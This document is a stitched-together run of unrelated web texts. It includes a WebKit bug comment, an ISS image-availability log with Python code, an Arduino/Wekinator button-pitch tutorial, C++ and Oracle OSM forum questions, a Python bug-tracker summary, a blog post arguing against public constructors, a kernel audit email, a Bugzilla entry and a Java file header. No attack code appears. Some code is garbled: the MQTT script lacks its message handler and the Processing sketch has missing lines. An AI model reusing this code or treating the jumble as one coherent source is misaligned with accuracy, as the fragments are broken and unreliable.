Failed to run "['Tools/Scripts/check-webkit-style', '--diff-files', u'Tools/ChangeLog', u'Tools/Scripts/webkitpy..." exit_code: 1
Traceback (most recent call last):
File "Tools/Scripts/check-webkit-style", line 51, in <module>
from webkitpy.style_references import detect_checkout
File "/mnt/git/webkit-style-queue/Tools/Scripts/webkitpy/style_references.py", line 47, in <module>
from webkitpy.common.checkout.scm import detect_scm_system
File "/mnt/git/webkit-style-queue/Tools/Scripts/webkitpy/common/checkout/scm/__init__.py", line 4, in <module>
from .scm import SCM, SVN, Git, CommitMessage, detect_scm_system, find_checkout_root, default_scm, AuthenticationError, AmbiguousCommitError, CheckoutNeedsUpdate
ImportError: No module named scm
If any of these errors are false positives, please file a bug against check-webkit-style.
Comment on attachment 91833 [details]
Patch
View in context:
> Tools/Scripts/webkitpy/test/main.py:153
> + # unittest.main has horrible error reporting when module imports are bad
> + # so we test import here to make debugging bad imports much easier.
> + for module in modules:
> + __import__(module)
Is this related?
(In reply to comment #3)
> (From update of attachment 91833 [details])
> View in context:
>
> > Tools/Scripts/webkitpy/test/main.py:153
> > + # unittest.main has horrible error reporting when module imports are bad
> > + # so we test import here to make debugging bad imports much easier.
> > + for module in modules:
> > + __import__(module)
>
> Is this related?
It made it posible to track down the import problems with making changes like this. It would have made tracking down your PIL problem super-easy.
Committed r85427: <> | https://bugs.webkit.org/show_bug.cgi?id=59884 | CC-MAIN-2019-26 | en | refinedweb |
What I got (red means: no live image available at that time/location):
Apparently, the live image is more or less consistently not available between some 38° east and 95° east. That's just based on one day, though, starting from unix timestamp 1534627704 (August 18th 2018, 21:28 UTC)
How I got there:
Here's a script that, whenever HDEV live image availability data is received via MQTT, requests the current ISS position from a web service and combines that information. The result is written to stdout, from where I wrote to a file. I had this script running for 24 hours (it self-terminates after that period of time):
# import urllib2 import json import paho.mqtt.client as mqtt import time def on_connect(client, userdata, flags, rc): client.subscribe("iss-hdev-availability/available-bool")() client.on_connect = on_connect client.on_message = on_message client.connect("test.mosquitto.org", 1883) client.loop_start() start_time = time.time() duration = 24*3600 while True: try: if time.time() > (start_time + duration): break time.sleep(1) except KeyboardInterrupt: break client.loop_stop()
So now we have live image availability vs location, for a 24h period. The dataset is here:
(it's also in the project files)
That data can be drawn on a map. I found out that there's a map toolkit for matplotlib, and installed it. The rest is quite simple:
import matplotlib as mpl mpl.use('Agg') # because the AWS EC2 machine doesn't have tkInter installed import matplotlib.pyplot as plt from mpl_toolkits.basemap import Basemap import numpy as np import csv # m = Basemap(projection='cyl',llcrnrlat=-90,urcrnrlat=90,\ llcrnrlon=-180,urcrnrlon=180,resolution='c') m.drawcoastlines() x = [] y = [] xn = [] yn = [] npoints = 0 with open('hdev-availability.csv') as csvfile: csvreader = csv.reader(csvfile) for row in csvreader: npoints += 1 lat = float(row[1]) lon = float(row[2]) available = int(row[3]) if available: x.append(lon) y.append(lat) else: xn.append(lon) yn.append(lat) plt.title("HDEV live image availability (last {} h)".format(int(npoints*6/3600))) m.scatter(x,y,3,marker='o',color='black',latlon=True) m.scatter(xn,yn,3,marker='o',color='red',latlon=True) plt.savefig('hdev-availability-map.png') # plt.show()
In the last line you see the save-image-to-file operation, and the result is the map shown at the top and again here:
Discussions
Become a Hackaday.io Member
Create an account to leave a comment. Already have an account? Log In. | https://hackaday.io/project/14729-iss-hdev-image-availability/log/151304-availability-map | CC-MAIN-2019-26 | en | refinedweb |
In this article, you are going to learn about how to change the pitch of the sound played using buttons with Arduino, Processing, and Wekinator.
We will read the states of the buttons using Arduino and will send the input to Processing. Processing will get it and will forward it to the Wekinator software. Wekinator will get trained according to the samples we send through the Processing and it will give the output to Chuck where the sound pitch will change.
Wekinator is a free, open source software that allows anyone to use machine learning to build new musical instruments, gestural game controllers, computer vision, or computer listening systems. Wekinator allows users to build new interactive systems by demonstrating human actions and computer responses, instead of writing programming code.
Setting up the Arduino Board
This project uses five buttons wired to an Arduino Uno. Make the connections for the buttons with the Arduino as seen in the figure below.
Project Sketches
On the input side, we will have an Arduino sketch and a Processing sketch. The Arduino sketch will read the states of the five buttons and forward it to Processing through serial communication. The Processing sketch will receive this data and will forward it to the Wekinator through the OSC (open sound control) protocol.
Arduino Sketch
#define buttonPin1 6 #define buttonPin2 5 #define buttonPin3 4 #define buttonPin4 3 #define buttonPin5 2 int inByte = 0; // incoming serial byte // the setup function runs once when you press reset or power the board void setup() { Serial.begin(115200); pinMode(buttonPin1, INPUT); pinMode(buttonPin2, INPUT); pinMode(buttonPin3, INPUT); pinMode(buttonPin4, INPUT); pinMode(buttonPin5, INPUT); establishContact(); // send a byte to establish contact until receiver // responds } // the loop function runs over and over again forever void loop() { // if we get a valid byte, read button pins: if (Serial.available() > 0) { // get incoming byte: inByte = Serial.read(); // read the state of the pushbuttons: int buttonState1 = digitalRead(buttonPin1); int buttonState2 = digitalRead(buttonPin2); int buttonState3 = digitalRead(buttonPin3); int buttonState4 = digitalRead(buttonPin4); int buttonState5 = digitalRead(buttonPin5); Serial.write(buttonState1); Serial.write(buttonState2); Serial.write(buttonState3); Serial.write(buttonState4); Serial.write(buttonState5); } } void establishContact() { while (Serial.available() <= 0) { Serial.print('A'); // send a capital A delay(300); } }
Processing Sketch
import processing.serial.*; import oscP5.*; import netP5.*; OscP5 oscP5; NetAddress dest; Serial myPort; // The serial port int[] serialInArray = new int[5]; // Where we'll put what we receive int serialCount = 0; // A count of how many bytes we receive int button1, button2, button3, button4, button5; boolean firstContact = false; // Whether we've heard from the microcontroller void setup() { size(256, 256); // Stage size noStroke(); // No border on the next thing drawn // Print a list of the serial ports, for debugging purposes: println(Serial.list()); //, 115200); /* start oscP5, sending messages at port 9000 */ oscP5 = new OscP5(this,9000); dest = new NetAddress("127.0.0.1",6448); } void draw() { //Send the OSC message sendOsc(); }: 3 bytes: if (serialCount > 4 ) { button1 = serialInArray[0]; button2 = serialInArray[1]; button3 = serialInArray[2]; button4 = serialInArray[3]; button5 = serialInArray[4]; // print the values (for debugging purposes only): println(button1 + "&" + button2 + "&" + button3 + "&" + button4 + "&" + button5); // Send a capital A to request new sensor readings: myPort.write('A'); // Reset serialCount: serialCount = 0; } } } void sendOsc() { OscMessage msg = new OscMessage("/wek/inputs"); msg.add((float)button1); msg.add((float)button2); msg.add((float)button3); msg.add((float)button4); msg.add((float)button5); oscP5.send(msg, dest); }
Setting up ChucK
On the output side, we can use ChucK to receive five continuous outputs from Wekinator and will make the sounds according to those.
Download the FM Synthesis example for the operating system that you are using.
Now open up the terminal and go to the directory where you have placed it and type in the following line:
chuck FMSynth_5ContinousOutputs.ck
Chuck will start to listen for the output from the Wekinator and on receiving the output, it will change the pitch of a sound.
Setting up Wekinator
Now open Wekinator and make the following adjustments to the settings:
- Set the inputs to 5 and outputs to 5
- Select the output type to all continuous
Wekinator will receive five inputs from Processing and, after training, will send five different outputs to Chuck. From there, ChucK will produce different sounds according to the Wekinator output.
Click on the Next button and you will see this window:
Press the first button and click on randomize. Start the recording for a second and it will record some samples.
Press the second button and click on randomize. Then record for a second.
Similarly, record the samples for the other three buttons.
After recording the five samples, click on train to train Wekinator. Then click run. Now when you press the buttons, the program will make the sound according to the inputs that you give. | https://maker.pro/arduino/tutorial/how-to-build-an-arduino-sound-pitch-machine | CC-MAIN-2019-26 | en | refinedweb |
Hi, I've spent several hours on this and I can't figure out what's wrong :( Please help.
Edit 2: I tried everything in Dev-C++ and there were no errors (I was originally using VC++), so it's a debugger problem :/ I still don't know how to solve it...
Edit: Here's a smaller program that I thought was pretty straightforward that still gives me the same error when debugging
Code:
#include<iostream>
using namespace std;
int main() {
int m=4;
int ** Rows;
Rows = new int * [m];
return 0;
}
Code:
#include<iostream>
using namespace std;
struct Node {
int row;
int col;
int value;
Node * next_in_col;
Node * next_in_row;
};
int main() {
int m, n;
cin >> m >> n;
Node * * Rows;
Rows = new Node * [m];
}
When I debug I get this error message:
"There is no source code available for the current location.
OK / Show Disassembly"
(the yellow arrow points to the first line: "mov edi,edi")(the yellow arrow points to the first line: "mov edi,edi")Quote:
--- f:\dd\vctools\crt_bld\self_x86\crt\src\newaop.cpp --------------------------
002C14C0 mov edi,edi
002C14C2 push ebp
002C14C3 mov ebp,esp
002C14C5 mov eax,dword ptr [count]
002C14C8 push eax
002C14C9 call operator new (2C1186h)
002C14CE add esp,4
002C14D1 pop ebp
002C14D2 ret
Also, I know it runs, but when I put it in a larger program it crashes miserably :( | https://cboard.cprogramming.com/cplusplus-programming/126426-there-no-source-code-available-current-location-printable-thread.html | CC-MAIN-2017-30 | en | refinedweb |
Red Hat Bugzilla – Full Text Bug Listing
+++ This bug was initially created as a clone of Bug #831254 +++.
--- Additional comment from jshaughn@redhat.com on 2012-06-12 12:00:35 EDT ---.
--- Additional comment from jshaughn@redhat.com on 2012-06-13 21:56:54 EDT ---.
Release/jon3.1.x commit: d06810bddd374669a54f254ad7ca7b94ccae0da5.
Conflicts:
modules/enterprise/gui/coregui/src/main/java/org/rhq/enterprise/gui/coregui/client/inventory/resource/ResourceCompositeSearchView.java
modules/enterprise/gui/coregui/src/main/java/org/rhq/enterprise/gui/coregui/client/inventory/resource/detail/ResourceTreeView.java
Cherry-pick of master: 1667f9730e4d547b399e1b30ad9965d8773d11a5
JON 3.1.1 ER1 build is available. Moving to ON_QA.
verified on JON 3.1.1 ER1
Created attachment 602168 [details]
import resources
verified.
Bulk closing of old issues in VERIFIED state. | https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=841274 | CC-MAIN-2017-30 | en | refinedweb |
[OSM] [Dependency] How can reverse dependencies be configuredRakesh N May 24, 2013 1:18 PM
The following is the business requirement for a Product Spec PS1 -
If Action Code is ADD - Function A --> Function B
If Action Code is DELETE - Function B --> Function A
Fulfillment Mode is DELIVER for both the scenarios with just different Action Codes.
This is NOT a rare requirement since Fulfillment Systems expect instructions to provision a service and terminate a service in reverse order. When an order is cancelled in-flight, that's how OSM typically rolls back the activities - in reverse order. However, this requirement is for a ceasing an existing service and NOT cancellation.
I configured the above 2 required dependencies in a Product Spec using Property Correlation Order Item Dependency. The xqueries of those dependencies are such that only one of them will return <osm:dependency/> nodes. The cartridge was built successfully with warnings. And cartridge was deployed successfully. However, on submission of order, OSM threw a circular dependency error. In order to rule out possibility of erroneous xqueries, I have made both of them return () only. So technically none of the dependencies will be created in the final orchestration plan. However, the error still persists.
So, one can safely conclude that OSM cannot tolerate reverse dependencies in a Product Spec regardless of them being in the final orchestration plan. (BUG?)
Is there any elegant solution to configure such dependencies.
Thanks in advance
Rakesh
Edited by: Rakesh N on 24-May-2013 06:15
Edited by: Rakesh N on 24-May-2013 06:17
Edited by: Rakesh N on 24-May-2013 06:18
1. Re: [OSM] [Dependency] How can reverse dependencies be configuredViktor.Jarolim-Oracle May 30, 2013 8:59 AM (in response to Rakesh N)Hi I would suggest that you raise an SR.
Viktor
2. Re: [OSM] [Dependency] How can reverse dependencies be configuredRakesh N May 30, 2013 9:29 AM (in response to Viktor.Jarolim-Oracle)I did Viktor. It's been a week almost. No response yet :)
3. Re: [OSM] [Dependency] How can reverse dependencies be configuredc3219a02-5ae8-40f3-8fd3-f07338d737f6 Jun 13, 2013 9:22 AM (in response to Rakesh N)1 person found this helpful
Hi Rakesh,
Though I do not consider it as a bug, but would be a good feature to have.
In the mean time, you may try following workaround to achieve same result.
I suggest, you create one more function - Function C and set the dependencies in PS1 as Function A -> Function B and Function B -> Function C
Also, in the last stage of decomposition of FunctionC (ie SignificantUpdate) set a condition, so that FunctionC Executable component will be created for DELETE line.
Similarly, in the last stage of decomposition of FunctionA (ie SignificantUpdate) set a condition, so that FunctionA Executable component will be created for ADD line.
Obviously, you have to take necessary care to ensure, both of the executable components (A, C) send payload to same target system.
Regards
Sumanta
4. Re: [OSM] [Dependency] How can reverse dependencies be configuredSrinivasK Sep 30, 2013 5:50 AM (in response to c3219a02-5ae8-40f3-8fd3-f07338d737f6)
Hi Sumanta,
I am going through this conversation and understanding the solution aspects for this type of scenario.
What do you mean by SignificantUpdate? Is that something OOTB related feature?
5. Re: [OSM] [Dependency] How can reverse dependencies be configuredRakesh N Oct 24, 2013 10:40 AM (in response to SrinivasK)
Hi Srinivas,
The OOTB O2A PIP cartridges have the following stages -
- Determine Fulfillment Function
- Determine Target System
- Determine Processing Granularity
- Determine Significant Updates
I hope that helps
Regards
Rakesh
6. Re: [OSM] [Dependency] How can reverse dependencies be configuredSachin_Lokhande_OSM Feb 20, 2014 2:05 PM (in response to Rakesh N)
Hi Rakesh,
Did solution mentioned by Sumanta worked in your case or you implemented any other solution?
Please let us know your comments because we came across same situation.
Regards,
Sachin L | https://community.oracle.com/message/11067832?tstart=0 | CC-MAIN-2017-30 | en | refinedweb |
ACTIVITY SUMMARY (2011-01-28 - 2011-02-04) Python tracker at To view or respond to any of the issues listed below, click on the issue. Do NOT respond to this message. Issues counts and deltas: open 2585 (+18) closed 20314 (+52) total 22899 (+70) Open issues with patches: 1102 Issues opened (49) ================== #10918: **kwargs unnecessarily restricted in concurrent.futures 'submi reopened by bquinlan #11023: pep 227 missing text reopened by r.david.murray #11048: "import ctypes" causes segfault on read-only filesystem opened by Arach #11049: add tests for test.support opened by brett.cannon #11050: email.utils.getaddresses behavior contradicts RFC2822 opened by Ivan.Egorov #11051: system calls per import opened by pitrou #11055: OS X IDLE 3.2 Save As menu accelerator opens two Save windows opened by ned.deily #11056: 2to3 fails for inner __metaclass__ class definition opened by nw #11062: mailbox fails to round-trip a file to a Babyl mailbox opened by r.david.murray #11063: uuid.py module import has heavy side effects opened by Keith.Dart #11067: Py_LIMITED_API breaks most PySomething_Check() functions opened by petere #11071: What's New review comments opened by ncoghlan #11072: Add MLSD command support to ftplib opened by giampaolo.rodola #11074: fix tokenize so it can be reloaded opened by brett.cannon #11076: Iterable argparse Namespace opened by vdupras #11077: Tkinter is not thread safe opened by PythonInTheGrass #11078: Have test___all__ check for duplicates opened by r.david.murray #11079: Make OS X entry in Applications like that in Windows opened by rhettinger #11085: expose _abcoll as collections.abc opened by rhettinger #11086: add lib2to3/__main__.py opened by brett.cannon #11087: Speeding up the interpreter with a few lines of code opened by jneb #11088: IDLE on OS X with Cocoa Tk 8.5 can hang waiting on input / raw opened by ned.deily #11089: ConfigParser 50x slower in 2.7 opened by vlachoudis #11090: Doc errors for unittest in Python 3.1 opened by michael.foord #11092: Setup.cfg isn't packaged when running sdist opened by Julien.Miotte #11093: test_future - rename not-unittest files to make regrtest.NOTTE opened by sandro.tosi #11096: Multiple turtle tracers opened by amcnerney13 #11097: MSI: Remove win32com dependency from installer generator opened by techtonik #11100: test_fdopen: close failed in file object destructor opened by ekrauss #11101: plistlib has no graceful way of handing None values opened by bobveznat #11102: configure doesn't find "major()" on HP-UX v11.31 opened by Oren_Held #11103: Python 3.2 installer doesn't register file extensions on Windo opened by darren #11104: distutils sdist ignores MANIFEST opened by jdennis #11105: Compiling evil ast crashes interpreter opened by benjamin.peterson #11107: Cache constant "slice" instances opened by scoder #11109: socketserver.ForkingMixIn leaves zombies opened by jwark #11110: Py_DECREF->Py_XDECREF in Module/_sqlite/module.c opened by brett.cannon #11112: UDPTimeoutTest derives from SocketTCPTest opened by rmtew #11113: html.entities mapping dicts need updating? opened by Brian.Jones #11114: TextIOWrapper.tell extremely slow opened by Laurens #11116: mailbox and email errors opened by sdaoden #11117: Implementing Async IO opened by jcea #1103350: send/recv SEGMENT_SIZE should be used more in socketmodule reopened by r.david.murray #11060: distutils2 sdist does not complain about version that is not P opened by gotcha #11061: Verify command option before parsing config file opened by sdouche #11066: cgi.py proposals : sys.stdout encoding + rewriting of parsing opened by quentel #11082: ValueError: Content-Length should be specified opened by William.Wu #11084: Serialization of decimal.Decimal to XML-RPC opened by gdr #1252236: Simplying Tkinter's event loop reopened by belopolsky Most recent 15 issues with no replies (15) ========================================== #11109: socketserver.ForkingMixIn leaves zombies #11101: plistlib has no graceful way of handing None values #11100: test_fdopen: close failed in file object destructor #11097: MSI: Remove win32com dependency from installer generator #11093: test_future - rename not-unittest files to make regrtest.NOTTE #11088: IDLE on OS X with Cocoa Tk 8.5 can hang waiting on input / raw #11074: fix tokenize so it can be reloaded #11072: Add MLSD command support to ftplib #11066: cgi.py proposals : sys.stdout encoding + rewriting of parsing #11063: uuid.py module import has heavy side effects #11062: mailbox fails to round-trip a file to a Babyl mailbox #11060: distutils2 sdist does not complain about version that is not P #11056: 2to3 fails for inner __metaclass__ class definition #11055: OS X IDLE 3.2 Save As menu accelerator opens two Save windows #11050: email.utils.getaddresses behavior contradicts RFC2822 Most recent 15 issues waiting for review (15) ============================================= #11116: mailbox and email errors #11110: Py_DECREF->Py_XDECREF in Module/_sqlite/module.c #11109: socketserver.ForkingMixIn leaves zombies #11104: distutils sdist ignores MANIFEST #11102: configure doesn't find "major()" on HP-UX v11.31 #11101: plistlib has no graceful way of handing None values #11093: test_future - rename not-unittest files to make regrtest.NOTTE #11090: Doc errors for unittest in Python 3.1 #11089: ConfigParser 50x slower in 2.7 #11086: add lib2to3/__main__.py #11082: ValueError: Content-Length should be specified #11079: Make OS X entry in Applications like that in Windows #11078: Have test___all__ check for duplicates #11076: Iterable argparse Namespace #11074: fix tokenize so it can be reloaded Top 10 most discussed issues (10) ================================= #11071: What's New review comments 20 msgs #10845: test_multiprocessing failure under Windows 12 msgs #7111: abort when stderr is closed 11 msgs #10227: Improve performance of MemoryView slicing 11 msgs #11114: TextIOWrapper.tell extremely slow 9 msgs #11082: ValueError: Content-Length should be specified 9 msgs #8914: Run clang's static analyzer 8 msgs #11037: State of PEP 382 or How does distutils2 handle namespaces? 8 msgs #11024: imaplib: Time2Internaldate() returns localized strings 8 msgs #2193: Cookie Colon Name Bug 7 msgs Issues closed (53) ================== #6045: Add more dict methods to dbm interfaces closed by eric.araujo #6465: email.feedparser regular expression bug (NLCRE_crack) closed by sandro.tosi #7074: Turtle module crashes python closed by belopolsky #8275: callback function on win64 results in bad behavior. mem corrup closed by pitrou #9124: Mailbox module should use binary I/O, not text I/O closed by r.david.murray #9127: subprocess.Popen.communicate() and SIGCHLD handlers closed by ned.deily #9418: Move _formatter_* methods from string type into _string module closed by eric.smith #9763: Crashes upon run after syntax error encountered in OSX 10.5.8 closed by ned.deily #9884: The 4th parameter of method always None or 0 on x64 Windows. closed by owenl #10480: cgi.py should document the need for binary stdin/stdout closed by v+python #10573: Consistency in unittest assert methods: order of actual, expec closed by michael.foord #10847: Distutils drops -fno-strict-aliasing when CFLAGS are set closed by eric.araujo #10939: imaplib: Internaldate2tuple raises KeyError parsing month and closed by belopolsky #10940: IDLE 3.2 hangs with Cmd-M hotkey on OS X 10.6 with 64-bit inst closed by ned.deily #10961: Pydoc touchups in new browser for 3.2 closed by georg.brandl #10989: ssl.SSLContext(True).load_verify_locations(None, True) segfaul closed by haypo #11025: Distutils2 install command without setup.py or setup.cfg creat closed by eric.araujo #11032: _string: formatter_field_name_split() and formatter_parser() d closed by eric.smith #11035: Segmentation fault closed by brett.cannon #11038: Some commands should stop if Name and Version are missing closed by eric.araujo #11040: After registering a project to PyPI, classifiers fields aren't closed by eric.araujo #11042: [PyPI CSS] Adding project urls onto a project page using regis closed by eric.araujo #11043: On GNU/Linux (Ubuntu) distutils2.mkcfg shouldn't create an exe closed by eric.araujo #11044: The description-file isn't handled by distutils2 closed by Julien.Miotte #11052: Fix OS X IDLE menu accelerators for Save As and Save Copy closed by ned.deily #11053: OS X IDLE 3 with Tk 8.4 appears to hang with syntax error closed by ned.deily #11054: OS X installer build script for 3.2 can no longer build with s closed by ned.deily #11057: Missing import of DistutilsOptionError closed by eric.araujo #11064: abc documentation version conflict closed by dustin.farris #11065: Fatal "can't locate locale" errors when zip file with director closed by ned.deily #11068: Python 2.7.1 Idle traceback on OS X (10.6.6) closed by r.david.murray #11069: IDLE crashes when Stack Viewer opened closed by georg.brandl #11070: test_capi crashes and fails closed by brian.curtin #11073: threading.Thread documentation can be improved closed by pitrou #11075: Using Turtle with IDLE on Mac OS X closed by amcnerney13 #11080: Win32Serial.read coding error for non-blocking read closed by brian.curtin #11081: from struct import * misses pack_into closed by belopolsky #11083: threading.Thread - start() rises RuntimeException? closed by brian.curtin #11091: Bug with reimport in pkg_resources closed by brett.cannon #11094: Runtime error closed by amaury.forgeotdarc #11095: subprocess popen broken for bytes and backslash closed by eric.smith #11098: syntax error at end of line in interactive python -u closed by r.david.murray #11099: Bytes pickled with 3.1 not unpickled with 2.7 correctly closed by r.david.murray #11106: python 2.6.6 and python 2.7.1 cannot be built successfully bec closed by skrah #11108: Intermittent AttributeError when using time.strptime in thread closed by amaury.forgeotdarc #11111: See "Gmail" on your Google homepage closed by belopolsky #11115: csv readers and writers should be context managers closed by r.david.murray #1613479: pydoc info for a package doesn't list all package contents closed by eric.araujo #10947: imaplib: Internaldate2tuple and ParseFlags require (and latter closed by lavajoe #11036: Allow multiple files in the description-file metadata closed by eric.araujo #11058: dist directory not created when running sdist command closed by kelseyhightower #11059: Mercurial fails on code.python.org repo closed by sdaoden #1647654: No obvious and correct way to get the time zone offset closed by belopolsky | https://mail.python.org/pipermail/python-dev/2011-February/107911.html | CC-MAIN-2017-30 | en | refinedweb |
All of us have probably written code like this:
Foo f = new Foo();
And what could be simpler? As long as the logic in the constructor is simple (or better yet, the constructor is empty), it would seem that the simplest code is the best, so just use the constructor. Certainly the MSDN documentation is rife with code that uses public constructors. You can probably find plenty of public constructors used right here on my blog. Why invest the effort in writing (and using) a factory class that will probably never do anything useful, other than call a public constructor?
In his excellent podcast entitled "Emergent Design: The Evolutionary Nature of Software Development," Scott Bain of Net Objectives nevertheless makes a strong case against the routine use of public constructors. The problem, notes Scott, is that the use of a public constructor ties the calling code to the implementation of Foo as a concrete class. But suppose that you later discover that there need to be many subtypes of Foo, and Foo should therefore be an abstract class instead of a concrete class--what then? You've got a big problem, that's what; a lot of client code that has been making use of Foo's public constructor suddenly becomes invalid.
Exposing a public constructor, observes Bain, allows code to violate the open/closed principle. This principle states that software should be open for extension, but closed for modification. Restating this in more mundane terms, developers should design their code in such a way that extending it (for example, making a class more useful by defining it as abstract and subclassing it as appropriate) does not provoke side effects elsewhere--and that's the "closed for modification" part in a nutshell.
Bain points out that there is a simple, low-cost practice that avoids the public constructor's violation of the open/closed principle. Just give a class constructor protected scope, and define a static Create method that uses the constructor--that's it. Here's class Foo's new skeletal definition in C#:
How hard was that? At the cost of a single line of code, you get benefits well beyond the already mentioned ability to transform the class into an abstract base class:
Unfortunately, you may occasionally encounter a corner case where you must define a public constructor. The .NET Framework's XmlSerializer cannot be used on a class with no public default constructor, since XmlSerializer must instantiate the class in order to discover the public properties that must be serialized. If you plan to serialize a class using XmlSerializer, then, you must make the constructor public--but you should mark it with the ObsoleteAttribute to warn fellow developers not to use it:
public class Foo
{
[Obsolete("Do not use--provided only for use by XmlSerializer. Client code should call Foo.Create().")]
public Foo() {}
public static Foo Create() { return new Foo(); }
}
If due to habit a fellow programmer calls the public constructor (against your intentions), the C# compiler will emit a helpful warning message. Of course, there are programmers who ignore warnings, but that is the subject of a different post. | http://geekswithblogs.net/chrisfalter/archive/2008/02/15/new-statement-considered-harmful.aspx | CC-MAIN-2017-30 | en | refinedweb |
On Tue, 2005-04-05 at 08:45 +0100, Christoph Hellwig wrote:> This introduces various AUDIT_ARCH numerical constants, which is a blatantly> stupid idea. We already have a way to uniquely identify architectures, and> that's the ELF headers, no need for another parallel namespace.We do use the EM_xxx number space but that isn't sufficient todistinguish between 32-bit and 64-bit incarnations of certain machinetypes (S390,SH,MIPS,...). I didn't much like adding it either, butcouldn't see a better option.I pondered strings but we want to filter on this and don't want to haveto use strcmp. Got any better answers?> (btw, could you please add to all patches who's responsible for them,> bk-audit.patch doesn't tell)If it were just to point to the BK tree, that might help. ( linux-audit.bkbits.net/audit-2.6-mm )-- dwmw2-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at | https://lkml.org/lkml/2005/4/5/214 | CC-MAIN-2017-30 | en | refinedweb |
mming77Members
Content count5
Joined
Last visited
Community Reputation183 Neutral
About lemming77
- RankNewbie
lemming77 replied to GSnake's topic in For BeginnersI believe OpenGL is an open standard, rather than being open source. But that's a mistake we all make at some point. [img][/img] My understanding is that the main distinguishing characteristic between C and C++ is that C++ is object oriented, while C is not. My experience with C is limited though, however OO is the dominant kind of programming knocking around right now I believe. If you've ever worked in one of the .net languages, that's OO. [img][/img] One metaphor I find is nice with OO programming is to imagine what you want your program to do is a project you're overseeing, and each of your objects is somebody on your team working on it. You organize them to work on their own parts, and at the end, you get the big picture you want. I'm afraid I can't point you in the direction of a good book or anything, as I approached C++ with lots of prior experience in OO programming. I'm sure there's plenty of people here who can, though! And finally, I'd have assumed your native language was English. You write very eloquently, and use punctuation well. There's people born here in England whose English isn't as clear as yours! [img][/img]
lemming77 replied to lemming77's topic in For BeginnersI hadn't thought of it like that. I just assumed that templates came with a huge level of extra functionality which was going to waste. I've done some experiments, and I think you're right. I really like how the template solution has worked out so far. I want to play around with it some more first, to better get to know it. But it's looking very likely that's the way I'll go! Thank you for the help!
lemming77 replied to lemming77's topic in For BeginnersTemplates do seem like a nice solution, although I can't help but wonder whether it's a bit overkill, since there's only the two versions of each I need. Are there any other ways I could do this for comparison?
lemming77 posted a topic in For BeginnersHi, As I'm sure is standard practice, I have written a library to implement types like vectors, matrices, and so on, and it all works quite nicely. However I have hit a hurdle. Using D3D9 for graphics, that seems to like having it's data in the form of single precision floats. Which is fair enough. But I'm feeling the need to do some intense physics simulation using double precision. So what I really want is some means of implementing both without duplicating my entire library. My current implementation lets me switch between Float and Double types before compiling by means of a typedef instruction. But this doesn't quite give me the solution I need, as I'm stuck choosing one over the other. [source lang="cpp"]// The library is called Util. Not a great name, I know. Here's a small excerpt // from Util.h. Define DOUBLE before compiling to use the double type. // Otherwise, use the float type. #ifdef DOUBLE typedef double Real; #define NAMESPACE Maths::Double #else typedef float Real; #define NAMESPACE Maths #endif namespace Util { namespace NAMESPACE { struct Angle; // Euler angle struct Matrix; // 4x4 Matrix struct Quaternion; struct Vector3; } } // An excerpt from Vector3.h namespace util { namespace NAMESPACE { // Vector3, 3D coordinates struct Vector3 { public: Real x, y, z; Vector3(); // x=0 y=0 z=0 Vector3(Real); // x=a y=a z=a Vector3(Real, Real, Real); // x=a y=b z=c /// ... Etc. }; }[/source] Can anyone recommend a means to implement both types into the same library? Preferably while duplicating as little source code as possible. I'm using Visual C++ 2010 Express. Thanks [img][/img]
lemming77 replied to pressgreen's topic in For Beginners[quote name='mhagain' timestamp='1342644613' post='4960647'] DDS is good, yes. It's lossy for sure, but like FLeBlanc said it can contain a full mipmap chain, and you can load it directly into your GPU's video RAM via the appropriate API calls without needing to go through any intermediate software stages. [/quote] DDS isn't necessarily lossy. DXT compression is lossy, but with DDS images, you have the option of using either that or storing them in an uncompressed format. I'd recommend experimenting with it a bit, as with some maps, this compression isn't a problem, and in others it is. For instance, DXT compressed normal maps tend to have quite ugly artefacts when used in game, but it's much less significant in DXT compressed albedo maps. | https://www.gamedev.net/profile/201021-lemming77/?tab=blog | CC-MAIN-2017-30 | en | refinedweb |
1 /*2 * Copyright (c) 2003 - 2007 OpenSubsystems s.r.o. Slovak Republic. All rights reserved.3 * 4 * Project: OpenSubsystems5 * 6 * $Id: SimpleLocalTransactionFactoryImpl.java,v 1.7 2007/01/07 06:14:21.db.transaction;23 24 import java.sql.Connection ;25 import java.sql.SQLException ;26 import java.util.logging.Logger ;27 28 import javax.transaction.HeuristicMixedException ;29 import javax.transaction.HeuristicRollbackException ;30 import javax.transaction.NotSupportedException ;31 import javax.transaction.RollbackException ;32 import javax.transaction.Status ;33 import javax.transaction.SystemException ;34 import javax.transaction.TransactionManager ;35 import javax.transaction.UserTransaction ;36 37 import org.opensubsystems.core.error.OSSDatabaseAccessException;38 import org.opensubsystems.core.error.OSSException;39 import org.opensubsystems.core.persist.db.DatabaseConnectionFactoryImpl;40 import org.opensubsystems.core.persist.db.DatabaseTransactionFactoryImpl;41 import org.opensubsystems.core.util.GlobalConstants;42 import org.opensubsystems.core.util.Log;43 44 /**45 * Simplified transaction management implementation based on database connection46 * using following assumptions:47 * 48 * Assumptions:49 * ------------50 * 1. Most applications use/access only single database, therefore there is no 51 * need for distributed transaction implementation.52 * 2. Applications consists of threads and each thread is using/needing only 53 * single database connection at a time. Most threads will never need two54 * connections at the same time to the same database.55 * 3. At most one transaction is in progress at any time in one thread.56 * 57 * Therefore if an application is accessing only a single database and threads 58 * of the application use only single connection at a time and start at most 59 * one transaction at a time the application can use this implementation of 60 * transaction manager.61 * 62 * How it works:63 * -------------64 * 1. Thread is using JDBC database connection to access the database.65 * 2. If thread starts an transaction using UserTransaction.begin then the 66 * connection used to access the database in this transaction has to have67 * autocommit set to false and the thread cannot issue commit or rollback on68 * the transaction. Then when thread ends transaction using 69 * UserTransaction.commit or UserTransaction.rollback then the transaction 70 * manager commits or rollbacks connections which was used to access the71 * database within this transaction.72 * 3. If thread is accessing the database outside of transaction, it can do 73 * whatever it wants with the connection including setting autocommit to true74 * and calling commit and rollback on the connection.75 * 76 * There are 4 basic and 4 combined scenarios possible:77 * ----------------------------------------------------78 * 1. Connection is requested before the transaction and returned after the transaction79 * 80 * DatabaseConnectionFactory.requestConnection81 * UserTransaction.begin82 * UserTransaction.commit/rollback83 * DatabaseConnectionFactory.returnConnection84 * 85 * 2. Connection is requested in the transaction and returned after the transaction86 * 87 * UserTransaction.begin88 * DatabaseConnectionFactory.requestConnection89 * UserTransaction.commit/rollback90 * DatabaseConnectionFactory.returnConnection91 * 92 * 3. Connection is requested before the transaction and returned in the transaction93 * 94 * DatabaseConnectionFactory.requestConnection95 * 